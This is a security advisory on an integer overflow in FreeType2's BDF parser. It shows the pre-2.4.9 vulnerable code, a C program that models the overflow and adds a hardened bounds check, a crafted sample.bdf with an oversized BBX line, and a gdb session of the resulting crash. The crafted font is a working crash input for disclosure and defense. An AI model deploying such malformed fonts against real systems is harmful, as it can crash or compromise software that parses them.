FREETYPE2 BDF font integer overflow in BBX field

Apr 9th, 2012
Byoungyoung Lee
http://twitter.com/mylifeasageek
http://exploitshop.wordpress.com

FreeType2 has an integer overflow in its handling of the BDF BBX field. The overflow makes the parser allocate a bitmap buffer that is much smaller than the glyph actually needs, and that buffer is then filled with attacker-controlled data from the font's BITMAP section, so it could be possible to execute arbitrary code. This is patched in FreeType2 2.4.9 (http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=c4cad30ed1b1f554aa41a98b0b0fdca6e579e22f).

You can download the PoC at http://www.cc.gatech.edu/~blee303/exploit/freetype2_bdf/bbx.bdf.

In bdflib.c (_bdf_parse_glyphs, before 2.4.9):

    /* Allocate enough space for the bitmap. */
    glyph->bpr = ( glyph->bbx.width * p->font->bpp + 7 ) >> 3;

    /* bpr * height can wrap around; only the wrapped value is checked */
    bitmap_size = glyph->bpr * glyph->bbx.height;
    if ( bitmap_size > 0xFFFFU )
    {
      FT_ERROR(( "_bdf_parse_glyphs: " ERRMSG4, lineno ));
      error = BDF_Err_Bbx_Too_Big;
      goto Exit;
    }
    else
      glyph->bytes = (unsigned short)bitmap_size;

    /* the allocation uses the truncated, possibly wrapped size */
    if ( FT_NEW_ARRAY( glyph->bitmap, glyph->bytes ) )
      goto Exit;


1. "p->font->bpp" can be set to 0x10. "glyph->bbx.width" and
   "glyph->bbx.height" are 16-bit (short) fields.
2. "glyph->bpr" can therefore end up somewhat larger than a 16-bit value.
3. When bitmap_size = glyph->bpr * glyph->bbx.height is computed, the
   product can overflow, and the wrapped value still passes the check
   (bitmap_size > 0xFFFFU), so glyph->bytes and the allocation end up far
   smaller than even one row of the bitmap.
4. I guess there should be a check on "glyph->bpr" as well.

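The arithmetic behind items 1 to 3, as an added example that is not part of the original advisory and not FreeType code: it models the pre-2.4.9 computation with 32-bit unsigned arithmetic (the gdb session below is on a 32-bit host, where unsigned long is 32 bits), feeds it the BBX values from sample.bdf below (53768 x 39940) together with bpp = 0x10 as stated in item 1, and contrasts the old check with a hardened one. The type widths, the uint32_t modelling, and the hardened check are this example's own assumptions, not the project's code.

```c
#include <stdint.h>
#include <stdio.h>

/*
 * Added example, not FreeType code.  Models the bitmap-size arithmetic of
 * bdflib.c _bdf_parse_glyphs() before 2.4.9.  Assumptions: bbx.width and
 * bbx.height are 16-bit, bpr and bitmap_size are 32-bit unsigned (unsigned
 * long on the 32-bit host of the advisory).  uint32_t is used so the
 * wrap-around reproduces on any host.
 */

/* bytes per row exactly as the parser computes it */
static uint32_t bdf_bpr(uint16_t width, uint16_t bpp)
{
    return ((uint32_t)width * bpp + 7) >> 3;
}

/* bitmap_size = bpr * height as a 32-bit unsigned product: wraps mod 2^32 */
static uint32_t old_bitmap_size(uint16_t width, uint16_t height, uint16_t bpp)
{
    return bdf_bpr(width, bpp) * (uint32_t)height;
}

/* the same product without wrap, i.e. what the check should have seen */
static uint64_t true_bitmap_size(uint16_t width, uint16_t height, uint16_t bpp)
{
    return (uint64_t)bdf_bpr(width, bpp) * height;
}

/* 1 if the pre-2.4.9 check `bitmap_size > 0xFFFFU' lets the glyph through */
static int old_check_accepts(uint16_t width, uint16_t height, uint16_t bpp)
{
    return old_bitmap_size(width, height, bpp) <= 0xFFFFU;
}

/*
 * How far writing a single bitmap row (bpr bytes) runs past the buffer the
 * old code allocates, i.e. (unsigned short)bitmap_size bytes.  0 means the
 * row fits; anything else is a heap overflow on the very first row.
 */
static uint32_t first_row_overrun(uint16_t width, uint16_t height, uint16_t bpp)
{
    uint32_t bpr   = bdf_bpr(width, bpp);
    uint16_t bytes = (uint16_t)old_bitmap_size(width, height, bpp);
    return bpr > bytes ? bpr - bytes : 0;
}

/*
 * Hardened version (this example's own, not the upstream patch): reject an
 * oversized bpr before multiplying, and bound the product by division so it
 * can never wrap.  Returns the size to allocate, or -1 if the glyph must be
 * rejected (the BDF_Err_Bbx_Too_Big path).
 */
static int32_t safe_bitmap_size(uint16_t width, uint16_t height, uint16_t bpp)
{
    uint32_t bpr = bdf_bpr(width, bpp);   /* < 2^32: both factors are 16-bit */

    if (bpr > 0xFFFFU)
        return -1;
    if (height != 0 && bpr > 0xFFFFU / height)
        return -1;                        /* bpr * height would exceed 0xFFFF */
    return (int32_t)(bpr * height);       /* provably <= 0xFFFF here */
}

int main(void)
{
    const uint16_t w = 53768, h = 39940, bpp = 16;   /* BBX from sample.bdf, bpp = 0x10 */

    printf("bpr               = %u\n", bdf_bpr(w, bpp));
    printf("true bitmap_size  = %llu\n", (unsigned long long)true_bitmap_size(w, h, bpp));
    printf("32-bit product    = %u (old check accepts: %s)\n",
           old_bitmap_size(w, h, bpp), old_check_accepts(w, h, bpp) ? "yes" : "no");
    printf("first row overrun = %u bytes\n", first_row_overrun(w, h, bpp));
    printf("hardened check    = %d\n", safe_bitmap_size(w, h, bpp));
    printf("sane 16x16 1bpp   = %d bytes\n", safe_bitmap_size(16, 16, 1));
    return 0;
}
```

With the sample's values bpr is 107536, already above 0xFFFF, and bpr * height is 4294987840, which wraps to 20544 in 32 bits; the old check accepts that, allocates 20544 bytes, and the first row alone is 86992 bytes too long for it. The hardened check refuses the glyph on the bpr test before the product is ever formed, while a normal 16x16 1-bpp glyph still gets its 32 bytes.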
lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ cat ./sample.bdf
STARTFONT 2.1
FONT -gnu-unifont-medium-r-normal--16-160-75-75-c-80-iso10646-1
SIZE 16 75 75 100
FONTBOUNDINGBOX 16 16 0 -2
STARTPROPERTIES 2
FONT_ASCENT 14
FONT_DESCENT 2
ENDPROPERTIES
CHARS 1
STARTCHAR U+0041
ENCODING 65
SWIDTH 50 0
DWIDTH 8 0
BBX 53768 39940 0 -2
BITMAP
00
01
02
03
04
05
06
07
08
09
10
11
12
13
14
00
ENDCHAR
ENDFONT

lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ ./ftbench -c 1 ./sample.bdf
Segmentation fault

lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ gdb -q ./ftbench
Reading symbols from /home/lifeasageek/ft/git/freetype2-demos/bin/ftbench...(no debugging symbols found)...done.
(gdb) r -c 1 ./sample.bdf
Starting program: /home/lifeasageek/ft/git/freetype2-demos/bin/ftbench -c 1 ./sample.bdf

Program received signal SIGSEGV, Segmentation fault.
0x080866bf in _bdf_parse_glyphs ()
(gdb) info reg
eax            0x810d078    135319672
ecx            0x0          0
edx            0xff         255
ebx            0xff         255
esp            0xbffff320   0xbffff320
ebp            0xbffff398   0xbffff398
esi            0x0          0
edi            0x0          0
eip            0x80866bf    0x80866bf <_bdf_parse_glyphs+2131>
eflags         0x210202     [ IF RF ID ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
(gdb) x/5i 0x080866bf
=> 0x80866bf <_bdf_parse_glyphs+2131>: movzbl (%eax),%eax
   0x80866c2 <_bdf_parse_glyphs+2134>: mov    %eax,%edx
   0x80866c4 <_bdf_parse_glyphs+2136>: shl    $0x4,%edx
   0x80866c7 <_bdf_parse_glyphs+2139>: mov    -0x20(%ebp),%eax
   0x80866ca <_bdf_parse_glyphs+2142>: movzbl 0x80bcfc0(%eax),%eax

The fault is the byte load through eax (0x810d078) at eip, inside _bdf_parse_glyphs while the glyph is still being parsed, i.e. after the undersized bitmap buffer has been allocated.